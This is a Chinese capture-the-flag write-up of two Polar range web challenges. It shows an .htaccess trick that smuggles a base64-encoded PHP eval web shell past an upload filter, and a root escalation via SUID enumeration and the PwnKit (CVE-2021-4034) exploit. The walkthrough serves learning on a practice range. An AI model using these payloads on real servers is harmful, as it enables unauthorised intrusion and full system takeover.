Polar靶场web 随记

1.上传

文件上传题

先上传一个jpg文件

发现有<?报错了

遇到这种情况直接 用script标签

发现上传成功了

但是改为php文件等候就出现文件不让上传

上传.htaccess文件,上传成功

再重新上传jpg文件,然后蚁剑连接 发现不成功 这里试了很多次依旧不成功 所以查了一下别人的wp

https://www.freebuf.com/articles/web/328241.html

高版本下服务器并不解析这种script标签为php代码(

从 PHP 7 开始,这种"ASP 风格"的 <script language="php">...</script> 语法被官方彻底移除了,

因此服务器再遇到它时只会原样当普通 HTML 输出,自然就不会执行里面的 PHP 代码。

用php_value auto_append_file用base64解码来包含恶意文件,从而绕过<?的限制

显示内容不能有file,尝试大小写绕过,但还是不行

最后发现用\可以绕过改为

AddType application/x-httpd-php .jpg

php_value auto_append_fi\

le "php://filter/convert.base64-decode/resource=shell.jpg"

然后将shell.jpg base64编码也就是将<?php @eval($_POST['1']); ?>编码

PD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOyA/Pg==

然后上传即可

2.这又是一个上传

随便上传一个php木马文件发现成功了

用蚁剑连接 连接后发现没有读取权限

点开虚拟终端

点开虚拟终端输入指令

find / -user root -perm -4000 -print 2>/dev/null

-perm 用于检查文件的权限

-4000 表示文件或目录的权限中设置了 SUID(Set User ID)位。SUID 是一种特殊的权限,当文件被执行时,会以文件所有者的权限运行。例如,如果一个文件的所有者是 root,并且设置了 SUID,那么任何用户执行该文件时,都会以 root 的权限运行。

2>/dev/null:

这是一个重定向操作,用于将命令的标准错误输出(stderr)重定向到 /dev/null。

/dev/null 是一个特殊的设备文件,用于丢弃所有写入它的数据。这里的作用是忽略命令执行过程中可能产生的错误信息,只保留标准输出(即搜索到的文件路径)。

用find / -user root -perm -4000 -print 2>/dev/null

发现pkexec .doas .setuid . setgid等一些可以让非 root 用户在满足特定策略的情况下执行需要 root 权限的命令

这里先只说pkexec

pkexec 是 PolicyKit 的一个工具,用于以其他用户的身份(通常是 root)执行程序。比直接使用 sudo 更灵活,因为它可以根据 PolicyKit 的策略文件来决定是否授权。

PolicyKit 是一个用于管理权限的框架,允许系统管理员定义哪些用户或组可以执行特定的系统操作。它通过策略文件(通常位于 /etc/polkit-1/rules.d/ 或 /usr/share/polkit-1/rules.d/)来控制权限。

发现有/opt/polkit-0.105/src/programs/.libs/pkexec

/opt/polkit-0.105:这是一个非标准的安装路径,通常用于安装第三方软件或自定义编译的软件。polkit-0.105 表示这是 PolicyKit 的 0.105 版本。

src/programs/.libs/:这个路径表明 pkexec 是从源代码编译生成的,并且位于源代码目录的 programs 子目录中的 .libs 文件夹里。.libs 文件夹通常用于存放编译过程中生成的库文件和可执行文件。

遇到这种题一般都是直接查对应版本有什么漏洞

Polkit 0.105 版本存在一个严重的本地权限提升漏洞,编号为 CVE-2021-4034,也被称为 PwnKit。

https://github.com/berdav/CVE-2021-4034

先用find / -type d -writable -print 2>/dev/null查找允许用户在其中创建、修改或删除文件的目录

我是在/tmp目录上传的文件(网上一般都有文件漏洞的下载)

到这本来是要解压文件的但是用·蚁剑中的指令解压不了。可以本地解压后上传单个文件,但是执行无效(没有完整的tty)

我看了一下大佬的wpPolar 这又是一个上传_这又是一个上传 polar-CSDN博客

所以我专用了哥斯拉来解决

在管理中生成一个这样的文件

任意命名最后上传时改为php就行

按照图中配置即可连接

将文件解压到upload上输入

make 然后输入./cve-2021-4034

即可进入root权限

相关推荐
徐小夕1 天前
JitWord Office预览引擎:如何用Vue3+Node.js打造丝滑的PDF/Excel/PPT嵌入方案
前端·vue.js·github
晴殇i1 天前
揭秘JavaScript中那些“不冒泡”的DOM事件
前端·javascript·面试
孟陬1 天前
国外技术周刊 #1:Paul Graham 重新分享最受欢迎的文章《创作者的品味》、本周被划线最多 YouTube《如何在 19 分钟内学会 AI》、为何我不
java·前端·后端
BER_c1 天前
前端权限校验最佳实践:一个健壮的柯里化工具函数
前端·javascript
兆子龙1 天前
别再用 useState / data 管 Tabs 的 activeKey 了:和 URL 绑定才香
前端·架构
sudo_jin1 天前
前端包管理器演进史:为什么 npm 之后,Yarn 和 pnpm 成了新宠?
前端·npm
叁两1 天前
用opencode打造全自动公众号写作流水线,AI 代笔太香了!
前端·人工智能·agent
golang学习记1 天前
GitLens 十大神技:彻底改变你在 VS Code 中的 Git 工作流
前端·后端·visual studio code
SuperEugene1 天前
后台权限与菜单渲染:基于路由和后端返回的几种实现方式
前端·javascript·vue.js
兆子龙1 天前
WebSocket 入门:是什么、有什么用、脚本能帮你做什么
前端·架构